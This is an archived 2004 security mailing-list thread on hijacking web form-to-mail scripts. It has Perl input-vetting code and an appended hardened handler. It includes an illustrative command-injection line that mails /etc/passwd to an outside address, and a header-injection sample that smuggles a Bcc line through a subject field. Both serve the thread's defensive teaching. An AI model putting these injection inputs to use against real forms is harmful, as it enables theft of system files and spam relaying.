RE: Secure Form Script?
From: Runion Mark A FGA DOIM WEBMASTER(ctr) (mark.runion_at_us.army.mil)
Date: 05/14/04
- Previous message: Bryce Porter: "RE: Secure Form Script?"
- Maybe in reply to: Victor Daniel a.k.a the MacNut: "Secure Form Script?"
- Next in thread: Tim Greer: "RE: Secure Form Script?"
- Reply: Tim Greer: "RE: Secure Form Script?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: focus-linux@securityfocus.com
Date: Fri, 14 May 2004 18:58:24 -0000
Because when they hijack the input to a sendmail command you generally see
something like this:
exec '$ sendmail $string';
And when the actual string looks something like:
exec '$ sendmail | sendmail -f /etc/passwd to@me.com';
If you set up a program to vet the input or use a secured shell to operate
your mail program, this can be ignored. Meaning compile your own without the
snazzy pipes, stops, or other functions one typically finds in all the
shells. For example, instead of using direct executes, just send the email.
Try something like this instead:
sub sendmail {
    my $mailto    = shift @_;                 # recipient chosen by the caller
    my $mailprog  = "/usr/bin/mailx";
    my $mailfrom  = "Your site";
    my $webmaster = 'you@example.com';        # shown on the error page (placeholder)
    # %Form is filled in by parse_form below. Strip CR/LF from anything that
    # goes into a header, so a form field cannot append extra header lines
    s/[\r\n]//g for $mailto, $Form{subject}, $Form{first_name};
    # Open the mail program; -t makes it read the recipients from the headers
    open(MAIL, "|$mailprog -t")
        || die "Content-type: text/html\n\nSENDMAIL ERROR: Please contact "
             . "<a href=\"mailto:$webmaster\">$webmaster</a>.";
    print MAIL "From: $mailfrom\n";
    print MAIL "To: $mailto\n";
    print MAIL "Subject: Your subject $Form{subject}, $Form{first_name}\n\n";
    print MAIL "---------------------------------------------------------------------\n";
    print MAIL "FIRSTN: $Form{first_name}\n";
    print MAIL "Systems List: $Form{system_list}\n\n";
    close MAIL;
    return 0;
}
If the incoming data is highly suspicious try something like:
    $Form{$name} =~ s/\|//g;   # drop pipe characters from the field named $name
So in a parsing function you might do this:
sub parse_form {
    # Collect the form data into the global hash %Form
    my $buffer = "";
    # Read the POST body; CONTENT_LENGTH is set by the web server
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'} || 0);
    # Split the name-value pairs
    my @pairs = split(/&/, $buffer);
    foreach my $pair (@pairs) {
        my ($name, $value) = split(/=/, $pair, 2);
        next unless defined $name;
        $value = '' unless defined $value;
        # Undo the URL encoding: '+' is a space, %XX is a byte
        $name  =~ tr/+/ /;
        $name  =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        # Clean it up: strip HTML/SSI comments (<!-- ... -->) from the value
        $value =~ s/<!--.*-->//gs;
        # Associate the name with the value, skipping empty fields
        if ($value ne '') {
            $Form{$name} = $value;
        }
    }
}
-
Mark Runion
/*
"So far beyond cutting edge the blade is null event horizon."
*/
-----Original Message-----
From: Stephen Samuel [mailto:samuel@bcgreen.com]
Sent: Thursday, May 13, 2004 1:56 PM
To: Michael Rice; focus-linux@securityfocus.com
Subject: Re: Secure Form Script?
Why not just a form that accepts a subject, a sender email
and a text message, then mails that to a specific user.
Even if they manage to hijack the fields due to improperly vetted
input, you'd still only end up with the input going to one
possible person (the recipient is specified on the (fixed)
sendmail command line).
Michael Rice wrote:
>>Can someone point me to a discussion about the issues involved with
>>hijacking web forms? In the applications I write, the destination address
>>is usually stored on the server, either in the script itself, or in a
>>configuration file, or in a database. I don't see how someone could use
>>such a script to change the destination address and point it at a list
>>of addresses belonging to spam victims.
>
>
> It's usually not sufficient to store the to addresses on the server
> and/or obfuscate the parameters used for the other input fields.
>
>
> Consider a form that constructs the email like:
>
> Date: $local->date
> From: $form->from
> To: $local->to
> Subject: $form->subject
>
> $form->body
>
> So, to hijack this form, I would construct a subject like:
--
Stephen Samuel +1(604)876-0426 samuel@bcgreen.com
http://www.bcgreen.com/~samuel/
Powerful committed communication. Transformation touching
the jewel within each person and bringing it to light.
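The three points made in this thread (never hand form data to a shell, parse and vet every field, keep the recipient fixed on the server side) collected into one handler, as an added example that is not code from this thread or from any of the posters. It assumes a constructed recipient table, a sendmail binary at /usr/sbin/sendmail, and form fields named dest, subject, first_name and body. It goes a step beyond the pipe-stripping above: any value destined for a header is rejected outright if it contains a CR or LF, which is the "construct a subject like" hijack Michael Rice's quoted message alludes to, and the mail program is started with Perl's list-form pipe open so no shell is ever involved.

```perl
#!/usr/bin/perl
# Hardened form-to-mail handler: added example, not code from the thread.
use strict;
use warnings;

# Fixed recipient table. The form selects a key; it never supplies an
# address, so the destination cannot be redirected. (Constructed values.)
my %RECIPIENTS = (
    sales   => 'sales@example.com',
    support => 'support@example.com',
);

# Decode an application/x-www-form-urlencoded body into a hash: the same
# steps as parse_form above (+ to space, %XX to byte), but returned as a
# reference instead of being stored in a global.
sub parse_query {
    my ($body) = @_;
    my %form;
    for my $pair (split /&/, $body) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && length $name;
        $value = '' unless defined $value;
        for ($name, $value) {
            tr/+/ /;
            s/%([0-9a-fA-F]{2})/chr(hex($1))/eg;
        }
        $form{$name} = $value;
    }
    return \%form;
}

# Reject, rather than silently strip, any header value containing CR or LF:
# an embedded newline is what lets a second header line (another recipient,
# say) be appended to the message. Returning undef lets the caller log it.
sub header_value {
    my ($value) = @_;
    return undef if $value =~ /[\r\n]/;
    return $value;
}

# Assemble the message text. Returns ($message, undef) on success or
# (undef, $reason) when a field fails validation.
sub build_message {
    my ($form) = @_;
    my $dest = defined $form->{dest} ? $form->{dest} : '';
    my $to   = $RECIPIENTS{$dest};
    return (undef, "unknown destination '$dest'") unless defined $to;

    my %hdr;
    for my $field (qw(subject first_name)) {
        my $raw   = defined $form->{$field} ? $form->{$field} : '';
        my $clean = header_value($raw);
        return (undef, "newline in $field") unless defined $clean;
        $hdr{$field} = $clean;
    }
    my $body = defined $form->{body} ? $form->{body} : '';

    my $message = "From: Web form <noreply\@example.com>\n"   # fixed sender
                . "To: $to\n"
                . "Subject: $hdr{subject}\n"
                . "\n"
                . "Name: $hdr{first_name}\n"
                . "---\n"
                . "$body\n";
    return ($message, undef);
}

# Hand the message to sendmail through a list-form pipe open. Passing the
# program and its arguments as separate list elements means no shell is
# involved, so metacharacters in the data are never interpreted. With -t
# the recipients come from the (validated) headers; -oi keeps a lone "."
# line in the body from ending the message early.
sub deliver {
    my ($message, $sendmail) = @_;
    $sendmail = '/usr/sbin/sendmail' unless defined $sendmail;
    open(my $mail, '|-', $sendmail, '-oi', '-t')
        or return "cannot run $sendmail: $!";
    print {$mail} $message;
    close($mail) or return "$sendmail exited with status " . ($? >> 8);
    return undef;
}

# Dry run on two constructed bodies: one valid, one carrying an encoded LF
# (%0A) in the subject, which is the header injection the check catches.
unless (caller) {
    my @samples = (
        'dest=sales&subject=Quote+request&first_name=Ana&body=Hello',
        'dest=sales&subject=Hi%0ABcc:+other@example.net&first_name=Ana&body=x',
    );
    for my $body (@samples) {
        my ($msg, $err) = build_message(parse_query($body));
        if (defined $msg) {
            print "ACCEPTED:\n$msg\n";     # call deliver($msg) to actually send
        } else {
            print "REJECTED: $err\n\n";    # log this; it is worth knowing about
        }
    }
}
```

Run it as a script and it prints one accepted message and one rejection; the second sample never reaches deliver(). In a real CGI you would read the body from STDIN up to CONTENT_LENGTH as parse_form does, and log the reason string on rejection rather than echoing it to the client.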